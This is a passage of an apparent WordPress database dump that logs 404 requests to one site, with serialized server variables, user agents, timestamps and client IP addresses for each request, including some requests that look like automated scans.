+http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632246605.9267070293426513671875;s:12:\"REQUEST_TIME\";i:1632246605;}}','notice','2021-09-21 17:50:08','2021-09-21 17:50:06',72146248,72229256,'https://zphiblgz.org/application',1,0,'87.250.224.144'),(97307,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4100.3 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632236509.463900089263916015625;s:12:\"REQUEST_TIME\";i:1632236509;}}','notice','2021-09-21 15:01:51','2021-09-21 15:01:49',72605584,72689320,'http://zphiblgz.org/scholarship/application/',1,0,'51.159.23.22'),(97306,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632224303.09603595733642578125;s:12:\"REQUEST_TIME\";i:1632224303;}}','notice','2021-09-21 11:38:25','2021-09-21 11:38:23',72757752,72842392,'https://zphiblgz.org/stats.php',1,0,'185.191.34.215'),(97305,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632216920.3747289180755615234375;s:12:\"REQUEST_TIME\";i:1632216920;}}','notice','2021-09-21 09:35:22','2021-09-21 09:35:20',72630200,72713968,'http://zphiblgz.org/application',1,0,'3.231.149.3'),(97304,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632214859.7685649394989013671875;s:12:\"REQUEST_TIME\";i:1632214859;}}','notice','2021-09-21 09:01:01','2021-09-21 09:01:00',72645744,72729400,'http://zphiblgz.org/old-index.php?daksldlkdsadas=1',1,0,'202.9.90.110'),(97303,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632205548.6996200084686279296875;s:12:\"REQUEST_TIME\";i:1632205548;}}','notice','2021-09-21 06:25:50','2021-09-21 06:25:48',72623800,72707536,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.47'),(97302,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632204088.98900604248046875;s:12:\"REQUEST_TIME\";i:1632204088;}}','notice','2021-09-21 06:01:30','2021-09-21 06:01:29',72605584,72689320,'http://zphiblgz.org/scholarship/application/',1,0,'176.48.36.237'),(97301,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632203213.6757938861846923828125;s:12:\"REQUEST_TIME\";i:1632203213;}}','notice','2021-09-21 05:46:55','2021-09-21 05:46:53',72605584,72689320,'http://zphiblgz.org/scholarship/application/',1,0,'92.118.77.10'),(97300,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632203209.032497882843017578125;s:12:\"REQUEST_TIME\";i:1632203209;}}','notice','2021-09-21 05:46:50','2021-09-21 05:46:49',72605552,72689288,'http://zphiblgz.org/scholarship/application/',1,0,'92.118.77.10'),(97299,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632193979.697174072265625;s:12:\"REQUEST_TIME\";i:1632193979;}}','notice','2021-09-21 03:13:01','2021-09-21 03:12:59',72605584,72689320,'http://zphiblgz.org/scholarship/application/',1,0,'103.26.142.68'),(96805,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631070888.26900005340576171875;s:12:\"REQUEST_TIME\";i:1631070888;}}','notice','2021-09-08 03:14:50','2021-09-08 03:14:48',72599720,72683456,'http://zphiblgz.org/scholarship/application/',1,0,'45.147.1.169'),(96806,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:68:\"text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:41:\"ru-RU, ru; q=0.8, en-US; q=0.5, en; q=0.3\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:19:\"https://google.com/\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631071985.5476219654083251953125;s:12:\"REQUEST_TIME\";i:1631071985;}}','notice','2021-09-08 03:33:07','2021-09-08 03:33:05',72599712,72683464,'http://zphiblgz.org/adminer-4.7.4.php',1,0,'194.61.24.99'),(96807,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631072148.3002998828887939453125;s:12:\"REQUEST_TIME\";i:1631072148;}}','notice','2021-09-08 03:35:50','2021-09-08 03:35:48',72607496,72690480,'https://zphiblgz.org/scholarship/application/',1,0,'85.249.46.123'),(96808,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:20:\"Mediapartners-Google\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631077505.2950708866119384765625;s:12:\"REQUEST_TIME\";i:1631077505;}}','notice','2021-09-08 05:05:07','2021-09-08 05:05:05',72306328,72389968,'http://zphiblgz.org/3510a6e0-c93e-411c-bce2-0fa07d09662c',1,0,'52.201.182.91'),(96809,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/7.0 (X11; U; Linux x86; es; rv:5.0) SeaMonkey/56.3.6 Iron/65.5.0 Chrome/59.4.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631077508.6497509479522705078125;s:12:\"REQUEST_TIME\";i:1631077508;}}','notice','2021-09-08 05:05:12','2021-09-08 05:05:09',72331128,72414768,'http://zphiblgz.org/3510a6e0-c93e-411c-bce2-0fa07d09662c',1,0,'52.201.182.91'),(96810,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:18:\"Go-http-client/1.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631077513.3082549571990966796875;s:12:\"REQUEST_TIME\";i:1631077513;}}','notice','2021-09-08 05:05:17','2021-09-08 05:05:14',72624464,72708104,'http://zphiblgz.org/3510a6e0-c93e-411c-bce2-0fa07d09662c',1,0,'52.201.182.91'),(96811,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:18:\"Go-http-client/1.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631077518.326992034912109375;s:12:\"REQUEST_TIME\";i:1631077518;}}','notice','2021-09-08 05:05:20','2021-09-08 05:05:19',72331440,72415080,'http://zphiblgz.org/3510a6e0-c93e-411c-bce2-0fa07d09662c',1,0,'52.201.182.91'),(96812,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631077944.7452700138092041015625;s:12:\"REQUEST_TIME\";i:1631077944;}}','notice','2021-09-08 05:12:26','2021-09-08 05:12:24',72599688,72683424,'http://zphiblgz.org/scholarship/application/',1,0,'154.13.1.162'),(96813,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631078344.1365768909454345703125;s:12:\"REQUEST_TIME\";i:1631078344;}}','notice','2021-09-08 05:19:06','2021-09-08 05:19:04',72599656,72683424,'http://zphiblgz.org/application',1,0,'52.54.63.240'),(96814,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631091957.3207190036773681640625;s:12:\"REQUEST_TIME\";i:1631091957;}}','notice','2021-09-08 09:05:59','2021-09-08 09:05:57',72599720,72683456,'http://zphiblgz.org/scholarship/application/',1,0,'146.70.52.76'),(96815,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631095873.30144500732421875;s:12:\"REQUEST_TIME\";i:1631095873;}}','notice','2021-09-08 10:11:17','2021-09-08 10:11:13',72704400,72788136,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.89.210'),(96816,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:145:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.44 Safari/537.36 OPR/69.0.3686.7 (Edition beta)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631102563.1127169132232666015625;s:12:\"REQUEST_TIME\";i:1631102563;}}','notice','2021-09-08 12:02:45','2021-09-08 12:02:43',72624432,72708168,'http://zphiblgz.org/scholarship/application/',1,0,'195.246.120.171'),(96817,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:64:\"Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631102851.8431499004364013671875;s:12:\"REQUEST_TIME\";i:1631102851;}}','notice','2021-09-08 12:07:34','2021-09-08 12:07:32',72659272,72759224,'http://zphiblgz.org/wordpress/wp-admin/setup-config.php?step=1',1,0,'49.12.201.221'),(96818,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631104702.1864240169525146484375;s:12:\"REQUEST_TIME\";i:1631104702;}}','notice','2021-09-08 12:38:25','2021-09-08 